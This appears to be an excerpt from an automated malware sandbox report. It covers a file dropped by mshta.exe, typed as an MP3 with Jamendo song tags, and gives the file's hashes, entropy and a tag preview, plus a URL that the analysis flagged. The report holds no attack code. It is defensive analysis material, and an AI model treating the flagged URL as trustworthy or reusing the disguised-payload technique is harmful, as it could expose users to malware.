                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: https://tavipulse.com/67a0c8749504c05865fba2d3
Process: C:\Windows\System32\mshta.exe
File Type: Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
Category: dropped
Size (bytes): 4807623
Entropy (8bit): 7.972997667438395
Encrypted: false
SSDEEP:
MD5: 05E42BA5EB9ADAD3643C11F3460889CE
SHA1: B84D1522F11B5258921FFCF3F3D9427AEB6232FB
SHA-256: 6FC3DAAD8BC4975AC66ECDFBC78C8F03787A2D3B54EA5CFB36996143BB04D715
SHA-512: 9EF842DE25B10099C17EEE6E0B3CB65773CD37D736AF97A092D80B0EB04AB85122D8B741D87A3629DF239D02D28889A6EB4C0166A572C8BE4206231D064324F3
Malicious: false
Reputation: unknown
                            Preview:ID3......'TIT2.......Fire.TPE1.......Seth Power.TRCK.......3.TALB.......Magnolia Soul.TDRC.......2017.TCON.......Pop.TCOM.......Seth Power.WPUB......http://www.jamendo.com.TPUB.......http://www.jamendo.com.TXXX..."...Tagging time.2018-06-20T06:50:58.TENC...&...Jamendo:http://www.jamendo.com| LAME.WOAS...'..http://www.jamendo.com/en/album/171527.COMM...(...eng.http://www.jamendo.com cc_standard.WOAF...(..http://www.jamendo.com/en/track/1483587.WOAR...(..http://www.jamendo.com/en/artist/503014.WCOP...,..http://creativecommons.org/licenses/by/3.0/.TCOP...-...http://creativecommons.org/licenses/by/3.0/.APIC...V...image/jpeg.........JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."........................................T.........................!1..AQa."q..2B....#3Rbr...$4CSs.....%....&c.....'5DEFTt................................(.....................!1..A.."Q2aqB.R..........
                            No static file info